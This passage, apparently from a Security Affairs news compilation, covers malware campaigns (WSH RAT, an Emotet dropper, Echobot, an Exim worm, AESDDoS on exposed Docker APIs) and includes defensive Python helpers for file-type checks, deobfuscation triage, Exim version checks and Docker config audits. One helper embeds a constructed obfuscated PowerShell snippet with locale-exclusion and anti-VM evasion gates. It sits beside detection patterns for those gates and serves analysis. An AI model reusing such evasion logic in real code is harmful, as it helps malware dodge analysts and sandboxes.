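    # and is what actually distinguishes PE32 (0x10B) from PE32+ (0x20B).
    magic = struct.unpack_from("<H", data, e_lfanew + 24)[0]
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, "PE (unknown magic 0x%x)" % magic)


def describe(data: bytes) -> str:
    """Content type from magic bytes only: gzip, PE32, PE32+, or other."""
    if data[:2] == GZIP_MAGIC:
        return "gzip"
    return pe_kind(data) or "other"


def check_download(name: str, data: bytes) -> dict:
    """Compare what the file name claims with what the bytes are."""
    actual = describe(data)
    claims = "gzip" if name.lower().endswith((".tar.gz", ".tgz", ".gz")) else "?"
    mismatch = claims != "?" and actual != claims
    return {"name": name, "claims": claims, "actual": actual,
            "suspicious": mismatch and actual.startswith("PE")}


def fake_pe(magic: int = 0x10B) -> bytes:
    """Constructed: 64-byte DOS header, PE signature, file header, optional Magic."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3E)                    # IMAGE_DOS_HEADER
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew -> 0x40
    file_header = struct.pack("<H", IMAGE_FILE_MACHINE_I386) + b"\0" * 18
    return bytes(hdr) + b"PE\0\0" + file_header + struct.pack("<H", magic)


# Constructed downloads: the names mimic the post's ".tar.gz that is a PE32".
SAMPLES = {
    "keylogger.tar.gz": fake_pe(),                          # PE32 wearing a .tar.gz name
    "update.tar.gz": b"\x1f\x8b\x08\x00" + b"\0" * 20,      # genuine gzip magic
    "tool.bin": fake_pe(0x20B),                             # PE32+, no claim to check
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        r = check_download(name, blob)
        print(f"{name:18} claims={r['claims']:5} actual={r['actual']:6} suspicious={r['suspicious']}")
```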

“This re-hash of Hworm proves that threat operators are willing to re-use techniques that still work in today’s IT environment. The phishing campaign that delivered the .zip containing a MHT file was able to bypass the Symantec Messaging Gateway’s virus and spam checks.” continues the post.

Experts published a list of indicators of compromise (IOCs).

Pierluigi Paganini

(SecurityAffairs – WSH Remote Access Trojan, hacking)

The post New phishing campaign targets bank customers with WSH RAT appeared first on Security Affairs.

From Targeted Attack to Untargeted Attack

Today I’d like to share an interesting and heavily obfuscated malware sample which made me think about the meaning of ‘Targeted Attack’.

Nowadays a targeted attack is mostly used to address state assets or business areas. For example, a targeted attack might address the naval industry (the MartyMcFly example is definitely a great example) or US companies (Botnet Against USA, Canada and Italy is another great example), and such attacks are mainly built around specific target sectors. When I looked at the following sample (which is a clear stereotype of an increasing trend of similar threats) I noticed a paradigm shift from “what to target” to “what to untarget”. In other words, it looks like the attacker doesn’t have a clear vision of his desired victims but, on the contrary, has very clear intentions about what kind of victims must be avoided. But let’s start from the beginning.

Looking at public samples submitted to Yomi (Yoroi’s public sandbox system), the following one caught my eye (sha256: c63cfa16544ca6998a1a5591fee9ad4d9b49d127e3df51bd0ceff328aa0e963a).

Public Submitted Sample on Yomi

The file looks like a common XLS file with a low antivirus detection rate, as shown in the following image (6/63).

Antivirus Detection Rate

By taking a closer look at the Office file it’s easy to spot the “Auto Open” procedures in VBA. The initial script is obfuscated through integer conversion and variable concatenation. A simple breakpoint and a message box to externalize the real payload are enough to expose the second stage, which happens to be written in PowerShell.

Deobfuscated Stage1 to Obfuscate Stage2

The second stage is obfuscated through function array enumeration and integer conversion as well. It took some minutes to work out how to move from the obfuscated version to a plain-text readable format, as shown in the next picture.

Stage2 Obfuscated
Stage2 DeObfuscated

Here comes the interesting side of the entire attack chain (at least from my personal point of view). As you might appreciate from the deobfuscated Stage2 code (previous image), two main objects are downloaded and run from external sources. The ‘*quit?’ object downloads a Windows PE (Stage3_a) and runs it, while the ‘need=js’ object returns an additional obfuscated JavaScript stage, let’s call it Stage3_b. We’ll take care of those stages later on; for now let’s focus on the initial conditional branch which discriminates the real behavior from the fake behavior, in other words it decides whether to run or stop the execution of the real behavior. While the second side of the conditional branch is quite normal behavior, -match "VirtualBox|VMware|KVM", which tries to avoid execution on virtual environments (trying to avoid detection and analysis), the first side is quite interesting. (GET-UICulture).Name -match "RO|CN|UA|BY|RU" tries to locate the victim machine and decides to attack everybody but not Romania, Ukraine, China, Russia and Belarus. So we are facing the one’s complement of a targeted attack. I’d like to call it an “untargeted” attack, which is not an opportunistic attack. Many questions come to my mind, for example why not attack those countries? Maybe the attacker fears those countries, or does the attacker belong to that area? Probably we’ll never get answers to such questions but we might appreciate this intriguing attack behavior. (BTW, I’m aware this is not the first sample with this characteristic, but I do know that it’s an increasing trend.) But let’s move on with the analysis.


Stage3_a is clearly the last infection stage. It looks like a romantic Emotet according to many antivirus engines, so I won’t invest time in this well-known malware.


Stage3_b looks like a quite big and obfuscated JavaScript code. The obfuscation implements three main techniques:

  • Encoded strings. The strings have been encoded in different ways, from “to Integer” to “Hexadecimal”.
  • String concatenation and dynamic evaluation. Using eval to dynamically extract values which are then used to decode more strings.
  • String substitutions. Through find-and-replace functions and loops to extract sub-strings, the attacker hides the clear text inside charset noise.

After some “hand work” the deobfuscated Stage3_b finally came out. The following image shows the deobfuscated section next to the obfuscated one. We are still facing one more obfuscated stage, let’s call it Stage4_b, which happens to be, again, an obfuscated PowerShell script… how about that!?

Stage3_b Obfuscated
Stage3_b Deobfuscated (obfuscated Stage4_b)

Stage4_b uses the same obfuscation techniques seen in Stage2, so let’s apply the same deobfuscation technique. Hmm, but… wait a minute… we already know that: it’s the deobfuscated Stage2! So we have two command and control servers serving the final launching script and gaining persistence on the victim.

Deobfuscated Stage4_b


Even if the sample is quite interesting per se, since it gets a low AV detection rate, that is not my actual point today. What is interesting is the introduction of another “targeting” state. We were accustomed to seeing targeted attacks, meaning attacks targeting specific industries, sectors or states, and opportunistic attacks, meaning attacks spread all over the world without specific targets. Today we might introduce one more “attack type”, the untargeted attack, meaning attacks on everybody except specific assets, industries or states (as in this analyzed case).
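The two things worth automating from this analysis are undoing the integer-conversion/concatenation obfuscation of Stage2 and Stage4_b, and spotting the two gates in the conditional branch: the locale exclusion on (Get-UICulture).Name and the VirtualBox|VMware|KVM check. The following triage helper is an added example, not code from the post or from Yoroi; the real Stage2 is only shown as a screenshot, so the obfuscated snippet below is constructed to mimic the [char]N style the post describes, and the Win32_ComputerSystem.Model check is an assumed stand-in for whatever the sample actually matched.

```python
"""Triage helper for PowerShell droppers of the kind analysed above.

Added example, not from the post or Yoroi. SAMPLE is constructed (assumption:
strings were built as [char]N+[char]M+... and "a"+"b" concatenations).
"""
import re

SAMPLE = (
    'if ((& ([char]71+[char]101+[char]116+[char]45+[char]85+[char]73+[char]67'
    '+[char]117+[char]108+[char]116+[char]117+[char]114+[char]101)).Name '
    '-match "RO|CN|UA|BY|RU" -or '
    '(Get-WmiObject Win32_ComputerSystem).Model -match "VirtualBox|VMware|KVM")'
    ' { exit }\n'
    '$q = ("nee"+"d=j"+"s")\n'
)

CHAR_TOKEN = re.compile(r"\[char\]\s*(\d+)", re.IGNORECASE)
# A run such as [char]71+[char]101+... that PowerShell would add into one string.
CHAR_RUN = re.compile(r"\[char\]\s*\d+(?:\s*\+\s*\[char\]\s*\d+)*", re.IGNORECASE)
# "abc"+"def" -> "abcdef"; applied repeatedly until nothing changes.
STR_CONCAT = re.compile(r'"([^"\n]*)"\s*\+\s*"([^"\n]*)"')

# The locale gate: ...Get-UICulture...).Name -match "RO|CN|..."
LOCALE_GATE = re.compile(
    r'Get-UICulture[^\n]*?\.Name\s*-(?:not)?match\s*"([^"]+)"', re.IGNORECASE)
# The anti-VM gate seen in the sample.
VM_GATE = re.compile(
    r'-(?:not)?match\s*"([^"]*(?:VirtualBox|VMware|KVM)[^"]*)"', re.IGNORECASE)


def decode_char_runs(script: str) -> str:
    """Replace every [char]N+[char]M... run with the literal string it builds."""
    def repl(m):
        text = "".join(chr(int(n)) for n in CHAR_TOKEN.findall(m.group(0)))
        return '"' + text.replace('"', '`"') + '"'     # `" escapes a quote in PS
    return CHAR_RUN.sub(repl, script)


def merge_string_concat(script: str) -> str:
    """Fold "a"+"b"+"c" into "abc"; each pass merges one adjacent pair."""
    prev = None
    while prev != script:
        prev = script
        script = STR_CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', script)
    return script


def deobfuscate(script: str) -> str:
    return merge_string_concat(decode_char_runs(script))


def triage(script: str) -> dict:
    """Deobfuscate, then report the 'untargeted' locale gate and the anti-VM gate."""
    clean = deobfuscate(script)
    locale = LOCALE_GATE.search(clean)
    excluded = sorted(locale.group(1).split("|")) if locale else []
    return {
        "deobfuscated": clean,
        "excluded_locales": excluded,        # e.g. ['BY', 'CN', 'RO', 'RU', 'UA']
        "vm_evasion": VM_GATE.search(clean) is not None,
        "verdict": ("untargeted: runs everywhere except " + ",".join(excluded))
                   if excluded else "no locale gate found",
    }


if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["deobfuscated"])
    print(report["verdict"], "| anti-VM:", report["vm_evasion"])
```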

Further technical details, including IoCs and Yara rules, are reported in the original post published on Marco Ramilli’s blog.

About the author Marco Ramilli

I am a computer security scientist with an intensive hacking background. I have an MD in computer engineering and a PhD in computer security from the University of Bologna. During my PhD program I worked for the US Government (at the National Institute of Standards and Technology, Security Division) where I did intensive research in malware evasion techniques and penetration testing of electronic voting systems.

I have experience in security testing since I have been performing penetration testing on several US electronic voting systems. I’ve also been in charge of testing the uVote voting system for the Italian Minister of homeland security. I met Palantir Technologies where I was introduced to the Intelligence Ecosystem. I decided to amplify my cybersecurity experiences by diving into SCADA security issues with some of the biggest industrial agglomerates in Italy. I finally decided to found Yoroi: an innovative Managed Cyber Security Service Provider developing some of the most amazing cybersecurity defence centers I’ve ever experienced! Now I technically lead Yoroi, defending our customers, strongly believing in: Defence Belongs To Humans

Edited by Pierluigi Paganini

(Security Affairs – targeted attack, hacking)

The post From Targeted Attack to Untargeted Attack appeared first on Security Affairs.

New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits

Operators behind the Echobot botnet added new exploits to infect IoT devices, and also enterprise apps Oracle WebLogic and VMware SD-Wan.

Recently a new botnet, tracked as Echobot, appeared in the threat landscape; its operators are adding new exploits to infect a broad range of systems, including IoT devices and the enterprise apps Oracle WebLogic and VMware SD-WAN.

The Echobot botnet was first detected by experts at Palo Alto Networks early this month; the botnet is based on the dreaded Mirai botnet. At the time of its discovery, operators had added 8 new exploits, but currently it includes 26 exploits.

The popular expert Larry Cashdollar, from Akamai’s Security Intelligence Response Team (SIRT), spotted a new version of the Echobot botnet that counts 26 different exploits.

“I recently came across an updated version of the Echobot binary that had some interesting additions. The first binary I found was compiled for ARM and still had the debugging information intact, which made it a little easier to analyze. While examining that binary, I discovered the system hosting the binaries and downloaded an x86 version that also still had the debugging symbols intact.” wrote the expert.

“I counted 26 different exploits that were being used in the spread of this botnet. Most were well-known command execution vulnerabilities in various networked devices.”

Cashdollar published a table comparing the two versions of Echobot and the exploits they use.

Echobot targets

The latest Echobot variant targets routers, network-attached storage devices (NAS), network video recorders (NVR), IP cameras, wireless presentation systems, and VoIP phones.

The experts pointed out that it was not simple to determine the vulnerabilities being exploited by the botnet because some of them had no CVE numbers assigned.

After he contacted MITRE, the organization assigned them identification numbers.

Below is the list of the exploits included in the Echobot variant discovered by the expert; some of the flaws triggered by the bot are decade-old vulnerabilities:


The most interesting aspect of this new botnet is the fact that it also includes exploits for Oracle WebLogic Server and for networking software VMware SD-WAN.

“What I found the most interesting, and not so surprising, is the inclusion of cross-application vulnerabilities. For example, rather than sticking to devices with embedded OSs like routers, cameras, and DVRs, IoT botnets are now using vulnerabilities in enterprise web (Oracle WebLogic) and networking software (VMware SD-WAN) to infect targets and propagate malware.” added the expert.

“Also of note is the inclusion of 10+ year old exploits for network devices that I believe may never have been patched by the vendors. This alludes to the botnet developers deliberately targeting unpatched legacy vulnerabilities.”

Botnet operators continue to implement new methods to make their malware more aggressive and to infect as many systems as possible. The latest Echobot variant targets flaws in IoT devices and in enterprise systems as well.

“Botnet developers are always looking for ways to spread malware. They are not just relying on exploiting new vulnerabilities that target IoT devices, but vulnerabilities in enterprise systems as well. Some of the new exploits they’ve added are older and have remained unpatched by the vendor. It seems the updates to Echobot are targeting systems that have possibly remained in service, but whose vulnerabilities were forgotten.” concluded the expert.

“This is an interesting tactic as these systems if found have remained vulnerable for years and will probably remain vulnerable for many more. Also, there are not just new exploitation vectors to examine but attack vectors as well. New weaknesses in popular protocols and services that can be leveraged to amplify and reflect attacks will be discovered.”

Pierluigi Paganini

(SecurityAffairs – Echobot botnet, IoT)

The post New Echobot Botnet targets Oracle, VMware Apps and includes 26 Exploits appeared first on Security Affairs.

Linux worm spreading via Exim servers hit Azure customers

On Friday, security experts at Microsoft warned of a new Linux worm, spreading via Exim email servers, that already compromised some Azure installs.

Bad actors continue to target cloud services in an attempt to abuse them for several malicious purposes, such as storing malware or hosting command and control servers.

Microsoft Azure is not immune; recently experts reported several attacks leveraging the platform to host tech-support scam and phishing templates.

Researchers already warned of the presence of some malware on the Microsoft Azure platform.

At the end of last week, Microsoft warned of a new Linux worm, spreading via Exim servers, that already compromised some Azure installs.

Recently, security experts reported ongoing attacks targeting millions of mail servers running vulnerable Exim mail transfer agent (MTA) versions. Different groups of hackers are exploiting the CVE-2019-10149 flaw to take them over.

The critical vulnerability affects versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) software. The flaw could be exploited by unauthenticated remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.

Exim CVE-2019-10149

The CVE-2019-10149 issue resides in the deliver_message() function in /src/deliver.c and is caused by the improper validation of recipient addresses. The flaw could lead to remote code execution with root privileges on the mail server; unfortunately, the vulnerability is easily exploitable by both local and remote attackers in certain non-default configurations.

The CVE-2019-10149 flaw was addressed by the Exim development team with the release of version 4.92 in February, but a large number of operating systems are still affected by the flaw.
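A first fleet-wide check for the affected range named above can be driven from SMTP greeting banners. The script below is an added example, not code from the article, from Exim or from Microsoft; its banners and hostnames are constructed, and its main caveat is the one that matters in practice: distributions backport fixes without changing the version string, so "in range" means "verify against the vendor changelog", not "confirmed vulnerable".

```python
"""Classify Exim versions from SMTP banners against CVE-2019-10149's range.

Added example, not from the article, Exim or Microsoft. Range 4.87 .. 4.91
and the fix in 4.92 are as stated in the article. Banners are constructed.
"""
import re
from typing import Dict, Optional, Tuple

FIRST_AFFECTED = (4, 87)
LAST_AFFECTED = (4, 91)
FIXED_IN = (4, 92)

# "220 host ESMTP Exim 4.91 ..." / "Exim 4.92.1 #3" / "Exim 4.89_1 ..."
EXIM_VER = re.compile(r"\bExim\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE)
# Heuristic (assumption): a distro name in the banner suggests a vendor
# package, which may carry a backported fix under the old version number.
DISTRO_HINT = re.compile(r"\b(Debian|Ubuntu|CentOS|Red Hat|RHEL|SUSE)\b", re.IGNORECASE)


def parse_exim_version(banner: str) -> Optional[Tuple[int, int, int]]:
    m = EXIM_VER.search(banner)
    if not m:
        return None              # not Exim, or the banner hides the version
    return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)


def classify(banner: str) -> Dict[str, object]:
    ver = parse_exim_version(banner)
    if ver is None:
        return {"version": None, "verdict": "unknown", "note": "no Exim version in banner"}
    major_minor = ver[:2]
    if FIRST_AFFECTED <= major_minor <= LAST_AFFECTED:
        verdict = "in-affected-range"
        note = ("vendor package; check changelog for a backported fix"
                if DISTRO_HINT.search(banner) else "upstream build; patch to 4.92 or later")
    elif major_minor >= FIXED_IN:
        verdict, note = "fixed", "4.92 or later"
    else:
        verdict, note = "outside-range-older", "predates 4.87; not covered by this check"
    return {"version": ".".join(map(str, ver)), "verdict": verdict, "note": note}


def audit_fleet(banners: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    return {host: classify(b) for host, b in banners.items()}


# Constructed banners; hostnames are placeholders.
BANNERS = {
    "mx1.example.test": "220 mx1.example.test ESMTP Exim 4.91 Ubuntu Mon, 17 Jun 2019 10:00:00 +0000",
    "mx2.example.test": "220 mx2.example.test ESMTP Exim 4.92 #3 Mon, 17 Jun 2019 10:00:00 +0000",
    "mx3.example.test": "220 mx3.example.test ESMTP Exim 4.89_1 Mon, 17 Jun 2019 10:00:00 +0000",
    "mx4.example.test": "220 mx4.example.test ESMTP Postfix",
}

if __name__ == "__main__":
    for host, r in audit_fleet(BANNERS).items():
        ver = r["version"] or "-"
        print(f"{host:20} {ver:8} {r['verdict']:22} {r['note']}")
```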

“CVE-2019-10149, which was first discovered on June 5, is now being used as the vulnerability for a widespread campaign to attack exim servers and propagate across the Internet.” reads a blog post published by Cybereason.

“We are aware of an initial wave of attacks as described by Freddie Leeman on June 9, 2019. The first hacker group began pushing exploits from a C2 server located on the clear web. A second round of attacks by a different attacker are being analyzed by the Nocturnus team.”

Attackers are scanning the internet for vulnerable mail servers; once a server is compromised, the initially deployed script downloads a second script designed to check whether OpenSSH is installed on the compromised machine.

If OpenSSH is not present, it installs and starts it to gain root logins via SSH using an RSA public/private key pair for authentication.

Microsoft has now detected a Linux worm that leverages the above flaw in vulnerable Linux Exim email servers in a cryptojacking campaign.

“This week, MSRC confirmed the presence of an active Linux worm leveraging a critical Remote Code Execution (RCE) vulnerability, CVE-2019-10149, in Linux Exim email servers running Exim version 4.87 to 4.91. Azure customers running VMs with Exim 4.92 are not affected by this vulnerability.” reads the advisory published by Microsoft.

Microsoft pointed out that Azure has already implemented controls to limit the spread of this Linux worm, but it urges customers to use up-to-date software to prevent infection.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs.” continues the advisory. “As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim.”

Pierluigi Paganini

(SecurityAffairs – Exim, Linux worm)

The post Linux worm spreading via Exim servers hit Azure customers appeared first on Security Affairs.

Modular Malware In The Nutshell

We are in an age of computing where programs grow toward feature-richness at best and bloatware at worst. Malware is also software; the developers creating it have access to the same development environments as developers of legitimate software. They have also realized that their malware was starting to become bloatware, as they build more and more features just for the purpose of bypassing antimalware products. And we should not start the discussion about how the antimalware industry kept producing bloated antivirus and endpoint products for the last ten years.

The larger the malware, the easier it is detected, both by antivirus products and by the keen observation of highly experienced system administrators. So what did they do? Divide their big malware into smaller chunks, with the main module containing “calls” that enable it to download a certain sub-module which performs other tasks for the malware. Here, we have covered since last year VPNFilter, a malware that resides both on Windows machines and in the firmware of the user’s home router.

VPNFilter survives the checks of antivirus software since it has the capability to export a part of itself, a submodule, to the home router. Ten years ago, such a capability for malware was just science fiction. For their malware to survive, such a capability had to be developed. Years ago, there were cases where malware tried to hide itself in the BIOS firmware of the computer and of video cards. Malware authors cannot do it again, as the BIOS gave way to today’s UEFI (Unified Extensible Firmware Interface), which implements stricter checks on writes to its firmware area.

Typical recommendations such as rebooting the router will reduce VPNFilter, but its staged modular approach makes it difficult for any router to remain uninfected. Until the source PC is removed from the network, the router with flawed firmware will continue to get infected by the same malware. Even resetting the router will not do any good as long as the source of infection remains online. What VPNFilter started has continued: the start of 2019 marks the detection and identification of 150,000 modular malware samples in the wild.

Security researchers are expecting more modular malware in the coming months and years. The good news is that, due to the need to download sub-modules from the command and control (C&C) servers, authorities can shut down the physical servers for good. That would make modular malware a short-lived creation, or at least that is what we are hoping for. However, the world is more surprising than what meets the eye; malware development does not happen in isolation. New malware, in fact thousands of new variants, is developed every single day. It will be impractical to replicate the FBI’s success in shutting down the C&C for every piece of modular malware that will be discovered.

What are practical ways to lessen the chance of contracting modular malware? The practical answer is to follow safe computing practices:

  1. Be doubtful of pop-ups, pop-unders and website redirectors. These misdemeanors are what Google itself is trying to stop by building a new feature into Chromium-based browsers to auto-block those actions by any website. A well-behaved site will not use pop-ups, pop-unders or website redirectors.
  2. Never neglect firmware updates for your home router, operating system and any Internet-facing apps. These updates include necessary and critical patches that prevent security vulnerabilities from being exploited.
  3. Never neglect establishing a credible backup habit. This can be a network shared drive, a NAS box or even the cloud. It is also strongly recommended to encrypt the files locally before uploading them, to minimize damage if the cloud provider gets hacked at any point.
  4. Establish a reliable SNMP-based monitoring system which can monitor ports and the external IP address communication of the network with the public Internet. It is very costly for an organization to establish reliable monitoring, but it needs to be done; it is an investment worth making. It is much better to spend on security than on damage control after a cyber attack incident.


Security Affairs newsletter Round 218 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.


Once again thank you!

Critical RCE affects older Diebold Nixdorf ATMs
Facebook is going to stop Huawei pre-installing apps on mobile devices
Millions of Exim mail servers vulnerable to cyber attacks
CIA sextortion campaign, analysis of a well-organized scam
CVE-2019-12735 – opening a specially crafted file in Vim or Neovim Editor could compromise your Linux system
Microsoft warns of spam campaign exploiting CVE-2017-11882 flaw
Retro video game website Emuparadise suffered a data breach
Shanghai Jiao Tong University data leak – 8.4TB in email metadata exposed
Spain extradites 94 Taiwanese to China phone and online fraud charges
Adobe Patch Tuesday updates fix code execution issues in Campaign, ColdFusion, and Flash
Customs and Border Protection (CBP) confirms hack of a subcontractor
CVE-2019-2725 Oracle WebLogic flaw exploited in cryptojacking campaign
How Ursnif Evolves to Keep Threatening Italy
MuddyWater APT group updated its multi-stage PowerShell backdoor Powerstats
Vulnerability in WordPress Live Chat Plugin allows to steal and hijack sessions
FIN8 Hacking Group is back with an improved version of the ShellTea Backdoor
Google expert disclosed details of an unpatched flaw in SymCrypt library
Microsoft Patch Tuesday security updates for June 2019 fix 88 flaws
Radiohead releases a trove of stolen music in response to the hack
RAMBleed, a new Side-Channel Attack that allows stealing sensitive data
Flaw in Evernote Web Clipper for Chrome extension allows stealing data
Massive DDos attack hit Telegram, company says most of junk traffic is from China
Ransomware paralyzed production for at least a week at ASCO factories
WAGO Industrial Switches affected by multiple flaws
Dissecting NanoCore Crimeware Attack Chain
French authorities released the PyLocky decryptor for versions 1 and 2
Millions of Exim mail servers are currently under attack
Mozilla addressed flaws in Thunderbird that allow code execution
Yubico is replacing for free YubiKey FIPS devices due to security weakness
Xenotime threat actor now is targeting Electric Utilities in US and APAC

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 218 – News of the week appeared first on Security Affairs.

“Human Error” Is The Biggest Corporate IT Issue

Here, we feature stories of virus infections, phishing incidents and other issues involving the private and public sectors caused by external risks. However, IT troubles in companies are not really caused by outsiders, but by human error inside the organization. It is necessary to think about how employees really perceive rules such as “do not leak information”, “don’t do this”, “don’t do that”. There are so many rules that people in the organization forget some of them, potentially doing something with a nasty result. It is not a walk in the park for any company to recover from a very bad “human error”.

Below are types of human errors:

1. Human Error in Management

It may be difficult to understand what “management error” means; examples are:

  • Loss of personal information after relocation.
  • Insufficient confirmation of the delivery of personal information, so that personal information that should have been received is lost.
  • Disclosure of information: management rules have not been clarified and information has been disclosed by mistake.

Even though a company has information management rules and security policies, management has not been carried out according to those rules. Or there is a possibility that such rules have not been decided at all. This indicates that it is important for employees to undergo thorough security education, and that management procedures regarding company information, including personal information, are important.

2. Misoperation

This is true for both emails and faxes: entering wrong addresses, wrong content, wrong attachments, etc. This is one of the most common of all human errors. It is necessary to thoroughly educate employees on security so that they do not make such mistakes.

3. Unauthorized access

Although the rate is low compared to mismanagement and misoperation, external unauthorized access via the Internet is performed continuously, and its attack methods are also evolving. Since it is often accompanied by attacks such as malware, it is important to be careful, as it leads to the theft of a lot of personal information if successful. Basic security measures such as installing anti-virus software are important but not absolute measures against unauthorized access.

4. Lost and misplaced

This is the case of taking information equipment such as a personal computer, including the data it contains, outside the work area, and then losing or misplacing it. Nowadays, tablet PCs and smartphones contain a lot of information, so they require careful handling. Leaving a device behind after drinking is a frequent case, and one of the worst. Because loss and misplacement occur at a high rate, it is necessary to take measures such as establishing strict rules for taking data out.

5. Unauthorized takeout and theft

Raise awareness among those who handle information. Implement a mechanism so that information cannot be easily taken out of the information system, and cannot be used even if it is taken out. This is based on the idea that access to information and security precautions should be addressed both by the person who uses it and by the system that handles it; both are usually not enough in a typical organization.

Practical ways to prevent IT issues caused by “human errors”:

  • Information learned at the firm should remain in the firm. Do not take information assets of companies or organizations outside. Specifically, do not take your laptop computer, USB memory, etc. home without permission. If permission is given, make sure the storage devices are encrypted. This will prevent information leakage in the event that the laptop or storage device is lost.
  • Do not leave important documents on the desk; likewise, never write critical information on post-it notes and never stick them on the monitor.
  • Do not leave the computer without locking the screen.
  • Do not discard information assets without proper measures; be sure to erase them. Specifically, when discarding a PC, be sure to delete the data on the hard disk, if not physically destroy the disk.
  • Do not bring private equipment (PCs etc.) into the company, unless BYOD is allowed.
  • Lock and no loan: do not lend or transfer the rights given to an individual to others without permission.
  • Prohibition of disclosure: do not divulge information you have learned on business without permission.


Crooks exploit exposed Docker APIs to build AESDDoS botnet

Cybercriminals are attempting to exploit an API misconfiguration in Docker containers to infiltrate them and run the Linux bot AESDDoS.

Hackers are attempting to exploit an API misconfiguration in the open-source version of the popular DevOps tool Docker Engine-Community to infiltrate containers and run the Linux bot AESDDoS (Backdoor.Linux.DOFLOO.AA).

Threat actors are actively scanning the Internet for exposed Docker APIs on port 2375 and using them to deliver malicious code that drops the AESDDoS Trojan.

“In this new attack, the threat actor first externally scans a given IP range by sending a TCP SYN packet to port 2375, the default port used for communicating with the Docker daemon.” reads the analysis published by Trend Micro. “Once an open port is identified, a connection asking for running containers is established. When a running container is spotted, the AESDDoS bot is then deployed using the docker exec command, which allows shell access to all applicable running containers within the exposed host. Hence, the malware is executed within an already running container while trying to hide its own presence.”

The AESDDoS malware has been active since at least 2014 and has been used to build large DDoS botnets; in some cases, it was also used in cryptojacking campaigns.

In recent months, threat actors focused their attention on misconfigured Docker services that could be abused for several malicious purposes.

“A batch file first executes the WinEggDrop scanner (s.exe), which tries port 2375 on various hosts with Chinese IP address ranges specified in the ip.txt file.” states the report. “The output of this command is saved into a file named ips.txt, which is then fed into the Docker.exe file.

We have also observed that the threat actor abuses a tool called the Docker Batch Test Tool that was developed to detect vulnerabilities in Docker.”

The malware also collects system information and sends it back to the C2; depending on the specific hardware configuration, the attackers can choose which kind of activity to carry out (i.e. launching DDoS attacks, mining cryptocurrency, etc.).

In the campaign observed by Trend Micro, the bot was deployed using the docker exec command to misconfigured containers.

The malware could allow the attackers to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The analysis published by Trend Micro includes technical details of the attacks and a list of Indicators of Compromise (IOCs).

In March, hundreds of Docker hosts were compromised in cryptojacking campaigns exploiting the CVE-2019-5736 runc vulnerability disclosed in February.

To secure Docker hosts, admins should allow only trusted sources to access the Docker API; below are some recommendations provided by Trend Micro.

“Docker explicitly warns against setting the Docker daemon to listen on port 2375 as this will give anyone the ability to gain root access to the host where the daemon is running, hence access to the API and address must be heavily restricted.” concludes the report.

“To prevent container-based incidents from happening, organizations can follow these guidelines:

  • Check API configuration. 
  • Implement the principle of least privilege. 
  • Follow recommended best practices. 
  • Employ automated runtime and image scanning to gain further visibility into the container’s processes (e.g., to determine if it has been tampered with or has vulnerabilities).”
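The first recommendation, "check API configuration", can be turned into an automated check. The following is an added example, not code from Trend Micro or from this post: it audits a daemon.json-style configuration for the exposure the report describes (a TCP listener on the unauthenticated port 2375, a TCP listener without TLS client-certificate verification, a bind to all interfaces). The sample configurations are constructed for this example.

```python
"""Audit a Docker daemon configuration for an exposed API listener.

Added example; it is not code from Trend Micro or from the Security Affairs post.
It checks a daemon.json-style configuration (a dict) for the weaknesses the report
warns about: a TCP listener on the unauthenticated default port 2375, a TCP
listener without TLS client-certificate verification, and a bind to all
interfaces. The sample configurations below are constructed for this example.
"""
from __future__ import annotations

import json
from urllib.parse import urlsplit

PLAINTEXT_PORT = 2375  # default (unauthenticated) Docker API port named in the report
TLS_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(config: dict) -> list[str]:
    """Return a list of findings; an empty list means no exposed-API issue was found."""
    findings: list[str] = []
    tls_verify = bool(config.get("tlsverify", False))
    for host in config.get("hosts", []):
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are reachable only from the host itself
        parsed = urlsplit(host)
        addr = parsed.hostname or "0.0.0.0"   # dockerd binds all interfaces when omitted
        port = parsed.port or PLAINTEXT_PORT  # dockerd defaults a bare tcp:// to 2375
        if port == PLAINTEXT_PORT:
            findings.append(f"{host}: listens on the plain-text API port {PLAINTEXT_PORT}")
        if not tls_verify:
            findings.append(f"{host}: TCP listener without tlsverify, so any client "
                            "that can reach it gets root-equivalent control of the host")
        elif not all(config.get(key) for key in TLS_KEYS):
            missing = [key for key in TLS_KEYS if not config.get(key)]
            findings.append(f"{host}: tlsverify is set but {', '.join(missing)} missing")
        if addr in ("0.0.0.0", "::"):
            findings.append(f"{host}: bound to all interfaces; restrict the address "
                            "or firewall it to trusted sources")
    return findings


def audit_daemon_json(text: str) -> list[str]:
    """Same check on the raw text of /etc/docker/daemon.json."""
    return audit_daemon_config(json.loads(text))


# Constructed sample: the exposed configuration the botnet operators scan for.
WEAK_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
}

# Constructed sample: remote access kept, but only for holders of a client
# certificate signed by the CA in tlscacert, on the TLS port, on one address.
HARDENED_CONFIG = {
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
}

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(f"{name}: {audit_daemon_config(cfg) or ['no findings']}")
```

The same listener can also be set with the `-H` flag on the dockerd command line, so a complete audit should cover the service unit as well as daemon.json.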

Pierluigi Paganini

(SecurityAffairs – containers, hacking)

The post Crooks exploit exposed Docker APIs to build AESDDoS botnet appeared first on Security Affairs.

